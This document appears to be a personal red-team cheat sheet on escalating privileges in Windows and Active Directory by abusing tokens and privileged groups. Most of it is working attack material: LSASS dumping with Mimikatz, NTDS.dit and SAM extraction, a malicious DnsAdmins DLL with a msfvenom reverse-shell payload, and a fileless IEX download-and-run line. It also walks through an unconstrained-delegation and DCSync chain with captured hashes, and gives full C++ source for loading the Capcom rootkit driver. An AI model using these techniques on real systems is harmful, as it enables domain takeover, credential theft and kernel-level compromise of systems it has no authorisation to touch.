Abuse Tokens

Enable all default token service account

If you compromise and service account for example svc_mssql account and the permission are disabled you can use the next tool to enable them.

GitHub - itm4n/FullPowers: Recover the default privilege set of a LOCAL/NETWORK SERVICE accountGitHub

SeImpersonate and SeAssignPrimaryToken

Favorite tool: GodPotato (Windows Server 2019/2022)

Tools:

• PrintSpoofer

• RoguePotato

• SharpEfsPotato

• EfsPotato

• DCOMPotato

CLSIDS working for Windows 2019/2022

c980e4c2-c178-4572-935d-a8a429884806  
90f18417-f0f1-484e-9d3c-59dceee5dbd8  
03ca98d6-ff5d-49b8-abc6-03dd84127020  
d99e6e73-fc88-11d0-b498-00a0c90312f3  
42cbfaa7-a4a7-47bb-b422-bd10e9d02700  
000c101c-0000-0000-c000-000000000046  
1bf48339-d15e-45f3-ad55-a851cb66be6b  
49e6370b-ab71-40ab-92f4-b009539e4518  
50d185b9-fff3-4656-92c7-e4018da4361d  
3c6859ce-230b-484d-be6c-9320c0202408

SeTakeOwnershipPrivilege

takeownMicrosoftLearn

GitHub - fashionproof/EnableAllTokenPrivsGitHub

PS C:\\htb> Import-Module .\\Enable-Privilege.ps1
PS C:\\htb> .\\EnableAllTokenPrivs.ps1
PS C:\\htb> whoami /priv

filess method:
IEX(New-Object Net.WebClient).DownloadString('<http://10.10.14.123/EnableAllTokenPrivs.ps1>');

#Check File permission
PS C:\\htb> Get-ChildItem -Path 'C:\\Department Shares\\Private\\IT\\cred.txt' | Select Fullname,LastWriteTime,Attributes,@{Name="Owner";Expression={ (Get-Acl $_.FullName).Owner }}

PS C:\\htb>takeown /f 'C:\\some\\file.txt' #Now the file is owned by you
PS C:\\htb> icacls 'C:\\some\\file.txt' /grant <your_username>:F #Now you have full access
# Use this with files that might contain credentials such as
%WINDIR%\\repair\\sam
%WINDIR%\\repair\\system
%WINDIR%\\repair\\software
%WINDIR%\\repair\\security
%WINDIR%\\system32\\config\\security.sav
%WINDIR%\\system32\\config\\software.sav
%WINDIR%\\system32\\config\\system.sav
%WINDIR%\\system32\\config\\SecEvent.Evt
%WINDIR%\\system32\\config\\default.sav
c:\\inetpub\\wwwwroot\\web.config

SeDebugPrivilege

ProcDump - SysinternalsMicrosoftLearn

• SeDebugPrivilege-Exploit (C++)

• SeDebugPrivilegePoC (C#)

• psgetsys.ps1 (Powershell Script)

C:\\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp

Mimikatz
sekurlsa::minidump lsass.dmp 
sekurlsa::logonpasswords

PS C:\\htb> Import-Module psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<system_pid>,<command_to_execute>)

Event Log Readers

Members of this group can read event logs from local computers. The group is created when the server is promoted to a domain controller.

Process Name generated: 4688(S): A new process has been created. (This event generates every time a new process starts.)

#Searching Security Logs Using wevtutil
PS C:\\htb> wevtutil qe Security /rd:true /f:text | Select-String "/user"

C:\\htb> wevtutil qe Security /rd:true /f:text /r:share01 /u:julie.clay /p:Welcome1 | findstr "/user"

#Searching Security Logs Using Get-WinEvent
Get-WinEvent -LogName security | where { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'} | Select-Object @{name='CommandLine';expression={ $_.Properties[8].Value }}

Note: Searching the Security event log with Get-WInEvent requires administrator access or permissions adjusted on the registry key HKLM\\System\\CurrentControlSet\\Services\\Eventlog\\Security. Membership in just the Event Log Readers group is not sufficient.

SeBackupPrivilege

• SeBackupPrivilegeUtils.dll

• SeBackupPrivilegeCmdLets.dll

#Import Libraries
PS C:\\htb> Import-Module .\\SeBackupPrivilegeUtils.dll
PS C:\\htb> Import-Module .\\SeBackupPrivilegeCmdLets.dll
#Enabling SeBackupPrivilege
PS C:\\htb> Set-SeBackupPrivilege
PS C:\\htb> Get-SeBackupPrivilege

#Abusing of seBackupPrivilege
PS C:\\htb> Copy-FileSeBackupPrivilege 'C:\\Confidential\\2021 Contract.txt' .\\Contract.txt
PS C:\\htb> Copy-FileSeBackupPrivilege E:\\Windows\\NTDS\\ntds.dit C:\\Tools\\ntds.dit

#Attacking a Domain Controller - Copying NTDS.dit 
PS C:\\htb> diskshadow.exe

Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer:  DC,  10/14/2020 12:57:52 AM

DISKSHADOW> set verbose on
DISKSHADOW> set metadata C:\\Windows\\Temp\\meta.cab
DISKSHADOW> set context clientaccessible
DISKSHADOW> set context persistent
DISKSHADOW> begin backup
DISKSHADOW> add volume C: alias cdrive
DISKSHADOW> create
DISKSHADOW> expose %cdrive% E:
DISKSHADOW> end backup
DISKSHADOW> exit

PS C:\\htb> dir E:

# Backing up SAM and SYSTEM Registry Hives
C:\\htb> reg save HKLM\\SYSTEM SYSTEM.SAV
C:\\htb> reg save HKLM\\SAM SAM.SAV

#Extracting Credentials from NTDS.dit
PS C:\\htb> Import-Module .\\DSInternals.psd1
PS C:\\htb> $key = Get-BootKey -SystemHivePath .\\SYSTEM
PS C:\\htb> Get-ADDBAccount -DistinguishedName 'CN=administrator,CN=users,DC=inlanefreight,DC=local' -DBPath .\\ntds.dit -BootKey $key

#Extracting Hashes Using SecretsDump
Intrusionz3r0@htb[/htb]$ secretsdump.py -ntds ntds.dit -system SYSTEM -hashes lmhash:nthash LOCAL

#Copying Files with Robocopy
C:\\htb> robocopy /B E:\\Windows\\NTDS .\\ntds ntds.dit

DnsAdmins

Malicious Custom DLL

Intrusionz3r0@htb[/htb]$ x86_64-w64-mingw32-gcc -o pwn.dll pwn.c -shared

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int pwn()
{
	system("COMMAND-HERE");
	return 0;
}

BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
		pwn();
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}

#Create Maicious DLL by using msfvenom
Intrusionz3r0@htb[/htb]$ msfvenom -p windows/x64/exec cmd='net group "domain admins" netadm /add /domain' -f dll -o adduser.dll
Intrusionz3r0@htb[/htb]$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP] LPORT=[PORT] -a x64 -f dll > rev.dll

#Loading Custom DLL
C:\\htb> dnscmd.exe /config /serverlevelplugindll C:\\Users\\netadm\\Desktop\\adduser.dll
C:\\htb> sc stop dns
C:\\htb> sc start dns

#Clean up (Run as Administrator Shell)
C:\\htb> reg query \\\\<ip-address>\\HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters
C:\\htb> reg delete \\\\<ip-address>\\HKLM\\SYSTEM\\CurrentControlSet\\Services\\DNS\\Parameters  /v ServerLevelPluginDll
C:\\htb> sc.exe start dns
C:\\htb> sc query dns

#Disabling the Global Query Block List
C:\\htb> Set-DnsServerGlobalQueryBlockList -Enable $false -ComputerName dc01.inlanefreight.local
C:\\htb> Add-DnsServerResourceRecordA -Name wpad -ZoneName inlanefreight.local -ComputerName dc01.inlanefreight.local -IPv4Address 10.10.14.3

Hyper-V Administrators

https://github.com/decoder-it/Hyper-V-admin-EOP/

#Starting the Mozilla Maintenance Service
C:\\htb> takeown /F C:\\Program Files (x86)\\Mozilla Maintenance Service\\maintenanceservice.exe
#Starting the Mozilla Maintenance Service
C:\\htb> sc.exe start MozillaMaintenance

SeEnableDelegationPrivilege

If you possess the ability to add computer SeMachineAccountPrivilege and SeEnableDelegationPrivilege you can abuse oof unconstrained delegation.

Windows

Adding Computer to the domain controller

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Import-Module .\Powermad.ps1
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> New-MachineAccount -MachineAccount EVIL -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
[+] Machine account EVIL added

Enabling unconstrained delegation

UserAccountControl Values: useraccountcontrol-manipulate-account-properties

Property flag	Value in decimal	Why?
WORKSTATION_TRUST_ACCOUNT	4096	Indicate is a machine account (mandatory)
TRUSTED_FOR_DELEGATION	524288	Enable Unconstrained Delegation

Total: 524288 + 4096 = 528384

#Enable unconstrained delegation by setting the userAccountControl attribute to 528384
*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute useraccountcontrol -Value 528384
[+] Machine account evil attribute useraccountcontrol updated

Adding a malicious HTTP SPN

Note: make computer look like a real service by adding SPN HTTP/EVIL.delegate.vl

*Evil-WinRM* PS C:\Users\N.Thompson\Documents> Set-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Value HTTP/EVIL.delegate.vl -Append
[+] Machine account evil attribute ServicePrincipalName appended

Checking the configuration applied

*Evil-WinRM* PS C:\Users\N.Thompson\Documents>  Get-MachineAccountAttribute -MachineAccount evil -Attribute ServicePrincipalName -Verbose
Verbose: [+] Domain Controller = DC1.delegate.vl
Verbose: [+] Domain = delegate.vl
Verbose: [+] Distinguished Name = CN=evil,CN=Computers,DC=delegate,DC=vl
HTTP/EVIL.delegate.vl
RestrictedKrbHost/EVIL
HOST/EVIL
RestrictedKrbHost/EVIL.delegate.vl
HOST/EVIL.delegate.vl

Adding a malicious DNS

❯ python3 dnstool.py -u 'delegate.vl\evil$' -p 'Password123' -r evil.delegate.vl -d 10.8.5.48 -a add dc1.delegate.vl -dns-ip 10.10.111.117
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully

Take time to replicate you can use nslookup evil.delegate.vl dc1.delegate.vl to sure is replicated into AD.

Running Krbrelayx to capture TGT

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71

Use: pypykatz crypto nt 'Password123'

Coercing the authentication to malicious dns

❯ python3 printerbug.py delegate.vl/'EVIL$:Password123'@10.10.111.117 evil.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at 10.10.111.117
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

Capturing the NT Hash via unconstrated delegation

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server

[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.111.117
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.111.117
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Performing DCSync Attack against domain controller.

❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
<SNIF>

Linux

Creating a machine account

❯ impacket-addcomputer  delegate.vl/N.Thompson:KALEB_2341 -computer-name z3r0 -computer-pass Password123
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Successfully added machine account z3r0$ with password Password123.

Adding the UserControlAccount attributes

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to z3r0$'s userAccountControl

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl add uac 'z3r0$' -f WORKSTATION_TRUST_ACCOUNT
[-] ['WORKSTATION_TRUST_ACCOUNT'] property flags added to z3r0$'s userAccountControl

❯ bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'useraccountcontrol'

Adding HTTP/CIFS SPN's to rogue computer

❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'HTTP/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl
❯ python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'CIFS/z3r0.delegate.vl' -t 'z3r0$' -dc-ip 10.10.79.76 dc1.delegate.vl

Checking the ServicePrincipalName

bloodyAD -u 'N.Thompson' -p 'KALEB_2341' --host dc1.delegate.vl -d delegate.vl get object 'z3r0$' --attr 'serviceprincipalname'

Running Krbrelayx to capture TGT

❯ python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80

Coercing the authentication to malicious dns

❯ python3 printerbug.py 'delegate.vl/z3r0$:Password123'@10.10.79.76 z3r0.delegate.vl
[*] Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Attempting to trigger authentication via rprn RPC at 10.10.79.76
[*] Bind OK
[*] Got handle
DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Triggered RPC backconnect, this may or may not have worked

Output from krbrelayx and printerbugshe;

[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.79.76
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.10.79.76
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'

Performing DCSync Attack

❯ KRB5CCNAME='DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache' impacket-secretsdump -k -no-pass dc1.delegate.vl -just-dc-user Administrator
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:f877adcb278c4e178c430440573528db38631785a0afe9281d0dbdd10774848c
Administrator:aes128-cts-hmac-sha1-96:3a25aca9a80dfe5f03cd03ea2dcccafe
Administrator:des-cbc-md5:ce257f16ec25e59e
[*] Cleaning up... 

Server Operators

PsService - SysinternalsMicrosoftLearn

#Querying the AppReadiness Service to check the status
C:\htb> sc qc AppReadiness

#C:\\htb> c:\\Tools\\PsService.exe security AppReadiness
C:\htb> c:\Tools\PsService.exe security AppReadiness

#Modifying the Service Binary Path (Abuse)
C:\htb> sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"

#Starting the Service
C:\htb> sc start AppReadiness

Print Operators

If we issue the command whoami /priv, and don't see the SeLoadDriverPrivilege from an unelevated context, we will need to bypass UAC.

https://www.nirsoft.net/utils/driverview.html#google_vignette

https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys

/*
Reference:
Compile: sudo apt install mingw-w64 -y && x86_64-w64-mingw32-g++ -o EnableSeLoadDriverPrivilege.exe EnableSeLoadDriverPrivilege.cpp -DUNICODE -D_UNICODE
<https://github.com/hatRiot/token-priv>
<https://github.com/TarlogicSecurity/EoPLoadDriver>

Enable the SeLoadDriverPrivilege of current process and then load the driver into the kernel.

First you need to add two reg keys,the command is:
reg add hkcu\\System\\CurrentControlSet\\CAPCOM /v ImagePath /t REG_SZ /d "\\??\\C:\\test\\Capcom.sys"
reg add hkcu\\System\\CurrentControlSet\\CAPCOM /v Type /t REG_DWORD /d 1
Then run me to load the driver(C:\\test\\Capcom.sys) into the kernel.

We will have all access on the system.
*/

#include <windows.h>
#include <assert.h>
#include <winternl.h>
#include <sddl.h>
#include <stdio.h>
#include "tchar.h"
#pragma comment(lib,"advapi32.lib") 
#pragma comment(lib,"user32.lib") 
#pragma comment(lib,"Ntdll.lib")

LPWSTR getUserSid(HANDLE hToken)
{

	// Get the size of the memory buffer needed for the SID
	//https://social.msdn.microsoft.com/Forums/vstudio/en-US/6b23fff0-773b-4065-bc3f-d88ce6c81eb0/get-user-sid-in-unmanaged-c?forum=vcgeneral
	//https://msdn.microsoft.com/en-us/library/windows/desktop/aa379554(v=vs.85).aspx

	DWORD dwBufferSize = 0;
	if (!GetTokenInformation(hToken, TokenUser, NULL, 0, &dwBufferSize) &&
		(GetLastError() != ERROR_INSUFFICIENT_BUFFER))
	{
		wprintf(L"GetTokenInformation failed, error: %d\\n",
			GetLastError());
		return NULL;
	}

	//https://social.msdn.microsoft.com/Forums/vstudio/en-US/6b23fff0-773b-4065-bc3f-d88ce6c81eb0/get-user-sid-in-unmanaged-c?forum=vcgeneral
	PTOKEN_USER pUserToken = (PTOKEN_USER)HeapAlloc(
		GetProcessHeap(),
		HEAP_ZERO_MEMORY,
		dwBufferSize);

	if (pUserToken == NULL) {
		HeapFree(GetProcessHeap(), 0, (LPVOID)pUserToken);
		return NULL;
	}

	// Retrive token info
	if (!GetTokenInformation(
		hToken,
		TokenUser,
		pUserToken,
		dwBufferSize,
		&dwBufferSize))
	{
		GetLastError();
		return NULL;
	}

	// Check if SID is valid
	if (!IsValidSid(pUserToken->User.Sid))
	{
		wprintf(L"The owner SID is invalid.\\n");
		return NULL;
	}

	LPWSTR sidString;
	ConvertSidToStringSidW(pUserToken->User.Sid, &sidString);
	return sidString;
}

ULONG
LoadDriver(HANDLE hToken)
{
	UNICODE_STRING DriverServiceName;
	ULONG dwErrorCode;
	NTSTATUS status;

	typedef NTSTATUS(_stdcall *NT_LOAD_DRIVER)(IN PUNICODE_STRING DriverServiceName);
	typedef void (WINAPI* RTL_INIT_UNICODE_STRING)(PUNICODE_STRING, PCWSTR);

	NT_LOAD_DRIVER NtLoadDriver = (NT_LOAD_DRIVER)GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtLoadDriver");
	RTL_INIT_UNICODE_STRING RtlInitUnicodeString = (RTL_INIT_UNICODE_STRING)GetProcAddress(GetModuleHandleA("ntdll.dll"), "RtlInitUnicodeString");

	LPWSTR win7regPath = new WCHAR[MAX_PATH];
	ZeroMemory(win7regPath, MAX_PATH);
	LPWSTR userSidStr;
	userSidStr = getUserSid(hToken);
	if (userSidStr == NULL)
	{
		wprintf(L"[+] Error while getting user SID\\n");
		CloseHandle(hToken);
		hToken = NULL;
	}

	lstrcat(win7regPath, L"\\\\Registry\\\\User\\\\");
	lstrcat(win7regPath, userSidStr);
	lstrcat(win7regPath, L"\\\\System\\\\CurrentControlSet\\\\CAPCOM");

	RtlInitUnicodeString(&DriverServiceName, win7regPath);

	status = NtLoadDriver(&DriverServiceName);
	printf("NTSTATUS: %08x, WinError: %d\\n", status, GetLastError());

	if (!NT_SUCCESS(status))
		return RtlNtStatusToDosError(status);

	return 0;
}

int IsTokenSystem(HANDLE tok)
{
	DWORD Size, UserSize, DomainSize;
	SID *sid;
	SID_NAME_USE SidType;
	TCHAR UserName[64], DomainName[64];
	TOKEN_USER *User;
	Size = 0;
	GetTokenInformation(tok, TokenUser, NULL, 0, &Size);
	if (!Size)
		return 0;

	User = (TOKEN_USER *)malloc(Size);
	assert(User);
	GetTokenInformation(tok, TokenUser, User, Size, &Size);
	assert(Size);
	Size = GetLengthSid(User->User.Sid);
	assert(Size);
	sid = (SID *)malloc(Size);
	assert(sid);

	CopySid(Size, sid, User->User.Sid);
	UserSize = (sizeof UserName / sizeof *UserName) - 1;
	DomainSize = (sizeof DomainName / sizeof *DomainName) - 1;
	LookupAccountSid(NULL, sid, UserName, &UserSize, DomainName, &DomainSize, &SidType);
	free(sid);

	printf("whoami:\\n%S\\\\%S\\n", DomainName, UserName);
	if (!_wcsicmp(UserName, L"SYSTEM"))
		return 0;
	return 1;
}

VOID RetPrivDwordAttributesToStr(DWORD attributes, LPTSTR szAttrbutes)
{
	UINT len = 0;
	if (attributes & SE_PRIVILEGE_ENABLED)
		len += wsprintf(szAttrbutes, TEXT("Enabled"));
	if (attributes & SE_PRIVILEGE_ENABLED_BY_DEFAULT)
		len += wsprintf(szAttrbutes, TEXT("Enabled by default"));
	if (attributes & SE_PRIVILEGE_REMOVED)
		len += wsprintf(szAttrbutes, TEXT("Removed"));
	if (attributes & SE_PRIVILEGE_USED_FOR_ACCESS)
		len += wsprintf(szAttrbutes, TEXT("Used for access"));
	if (szAttrbutes[0] == 0)
		wsprintf(szAttrbutes, TEXT("Disabled"));
	return;
}

int GetTokenPrivilege(HANDLE tok)
{
	PTOKEN_PRIVILEGES ppriv = NULL;
	DWORD dwRet = 0;
	GetTokenInformation(tok, TokenGroups, ppriv, dwRet, &dwRet);
	if (!dwRet)
		return 0;
	ppriv = (PTOKEN_PRIVILEGES)calloc(dwRet, 1);
	GetTokenInformation(tok, TokenPrivileges, ppriv, dwRet, &dwRet);
	printf("\\nwhoami /priv\\n");
	for (int i = 0; i < ppriv->PrivilegeCount; i++)
	{
		TCHAR lpszPriv[MAX_PATH] = { 0 };
		DWORD dwRet = MAX_PATH;
		BOOL n = LookupPrivilegeName(NULL, &(ppriv->Privileges[i].Luid), lpszPriv, &dwRet);
		printf("%-50ws", lpszPriv);
		TCHAR lpszAttrbutes[1024] = { 0 };
		RetPrivDwordAttributesToStr(ppriv->Privileges[i].Attributes, lpszAttrbutes);
		printf("%ws\\n", lpszAttrbutes);
	}
	return 1;
}

BOOL EnablePriv(HANDLE hToken, LPCTSTR priv)
{

	TOKEN_PRIVILEGES tp;
	LUID luid;

	if (!LookupPrivilegeValue(NULL, priv, &luid))
	{
		printf("[!]LookupPrivilegeValue error\\n");
		return 0;
	}
	tp.PrivilegeCount = 1;
	tp.Privileges[0].Luid = luid;
	tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
	if (!AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(TOKEN_PRIVILEGES), (PTOKEN_PRIVILEGES)NULL, (PDWORD)NULL))
	{
		printf("[!]AdjustTokenPrivileges error\\n");
		return 0;
	}

	IsTokenSystem(hToken);
	GetTokenPrivilege(hToken);

	return TRUE;
}

int _tmain(int argc, _TCHAR* argv[])
{
	HANDLE hToken;
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
	{
		printf("[!]OpenProcessToken error\\n");
		return 0;
	}

	EnablePriv(hToken, SE_LOAD_DRIVER_NAME);
	LoadDriver(hToken);
	return 0;
}